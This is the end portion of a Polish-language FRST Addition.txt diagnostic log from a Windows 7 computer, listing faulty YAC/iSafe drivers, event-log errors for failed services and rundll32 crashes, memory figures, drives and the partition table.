iSafeKrnlKit Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: YAC Ring3 Driver Description: YAC Ring3 Driver Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: iSafeKrnlR3 Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: YAC NDIS Driver Description: YAC NDIS Driver Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: iSafeNetFilter Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (05/13/2017 08:02:54 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: ) Description: Event-ID 0 Error: (05/13/2017 07:53:04 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/12/2017 07:19:46 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/12/2017 04:41:24 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/12/2017 12:01:13 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: msvcrt.dll, wersja: 7.0.7601.17744, sygnatura czasowa: 0x4eeaf722 Kod wyjątku: 0x40000015 Przesunięcie błędu: 0x0005620a Identyfikator procesu powodującego błąd: 0x1254 Godzina uruchomienia aplikacji powodującej błąd: 0x01d2cb047ff069ba Ścieżka aplikacji powodującej błąd: C:\windows\SysWOW64\rundll32.exe Ścieżka modułu powodującego błąd: C:\Windows\syswow64\msvcrt.dll Identyfikator raportu: ee27243f-36f9-11e7-bb2c-001d92899e2e Error: (05/12/2017 12:01:11 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: msvcrt.dll, wersja: 7.0.7601.17744, sygnatura czasowa: 0x4eeaf722 Kod wyjątku: 0x40000015 Przesunięcie błędu: 0x0005620a Identyfikator procesu powodującego błąd: 0xe38 Godzina uruchomienia aplikacji powodującej błąd: 0x01d2cb04754422d6 Ścieżka aplikacji powodującej błąd: C:\windows\SysWOW64\rundll32.exe Ścieżka modułu powodującego błąd: C:\Windows\syswow64\msvcrt.dll Identyfikator raportu: ecc8aa91-36f9-11e7-bb2c-001d92899e2e Error: (05/12/2017 12:01:10 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: msvcrt.dll, wersja: 7.0.7601.17744, sygnatura czasowa: 0x4eeaf722 Kod wyjątku: 0x40000015 Przesunięcie błędu: 0x0005620a Identyfikator procesu powodującego błąd: 0xb84 Godzina uruchomienia aplikacji powodującej błąd: 0x01d2cb046d205b92 Ścieżka aplikacji powodującej błąd: C:\windows\SysWOW64\rundll32.exe Ścieżka modułu powodującego błąd: C:\Windows\syswow64\msvcrt.dll Identyfikator raportu: ec70738f-36f9-11e7-bb2c-001d92899e2e Error: (05/12/2017 12:01:07 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: msvcrt.dll, wersja: 7.0.7601.17744, sygnatura czasowa: 0x4eeaf722 Kod wyjątku: 0x40000015 Przesunięcie błędu: 0x0005620a Identyfikator procesu powodującego błąd: 0x11a0 Godzina uruchomienia aplikacji powodującej błąd: 0x01d2cb048b13e632 Ścieżka aplikacji powodującej błąd: C:\windows\SysWOW64\rundll32.exe Ścieżka modułu powodującego błąd: C:\Windows\syswow64\msvcrt.dll Identyfikator raportu: ea7bc5bb-36f9-11e7-bb2c-001d92899e2e Error: (05/12/2017 12:01:07 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: msvcrt.dll, wersja: 7.0.7601.17744, sygnatura czasowa: 0x4eeaf722 Kod wyjątku: 0x40000015 Przesunięcie błędu: 0x0005620a Identyfikator procesu powodującego błąd: 0xb70 Godzina uruchomienia aplikacji powodującej błąd: 0x01d2cb04970df64e Ścieżka aplikacji powodującej błąd: C:\windows\SysWOW64\rundll32.exe Ścieżka modułu powodującego błąd: C:\Windows\syswow64\msvcrt.dll Identyfikator raportu: ea618bdd-36f9-11e7-bb2c-001d92899e2e Error: (05/12/2017 09:54:43 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: ) Description: Event-ID 0 Dziennik System: ============= Error: (05/13/2017 08:09:29 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa NPASRE niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 21600000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/13/2017 07:55:00 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Windows GameExplorer Update zakończyła działanie; wystąpił następujący błąd: Nie można odnaleźć określonego modułu. Error: (05/13/2017 07:54:59 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Apple Notifications Service zakończyła działanie; wystąpił następujący błąd: Nie można odnaleźć określonego modułu. Error: (05/13/2017 07:54:59 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Apple Cloud Service zakończyła działanie; wystąpił następujący błąd: Nie można odnaleźć określonego modułu. Error: (05/13/2017 07:53:50 AM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Uruchom do aplikacji serwera COM z identyfikatorem klasy CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} i identyfikatorem aplikacji APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (05/13/2017 07:52:59 AM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: iSafeKrnl iSafeKrnlKit iSafeKrnlMon iSafeKrnlR3 iSafeNetFilter Error: (05/13/2017 07:52:42 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa 3DM zakończyła działanie; wystąpił następujący błąd: Nie można odnaleźć określonego modułu. Error: (05/13/2017 07:52:32 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi MBAMChameleon z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (05/12/2017 07:36:06 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa NPASRE niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 21600000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/12/2017 07:21:50 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Windows GameExplorer Update zakończyła działanie; wystąpił następujący błąd: Nie można odnaleźć określonego modułu. ==================== Statystyki pamięci =========================== Procesor: AMD Athlon(tm) 64 X2 Dual Core Processor 5200+ Procent pamięci w użyciu: 44% Całkowita pamięć fizyczna: 4095.37 MB Dostępna pamięć fizyczna: 2285.1 MB Całkowita pamięć wirtualna: 8188.94 MB Dostępna pamięć wirtualna: 6274.39 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:102.68 GB) (Free:40.63 GB) NTFS Drive e: (Nowy) (Fixed) (Total:195.31 GB) (Free:14.07 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: FC94836F) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=102.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=195.3 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================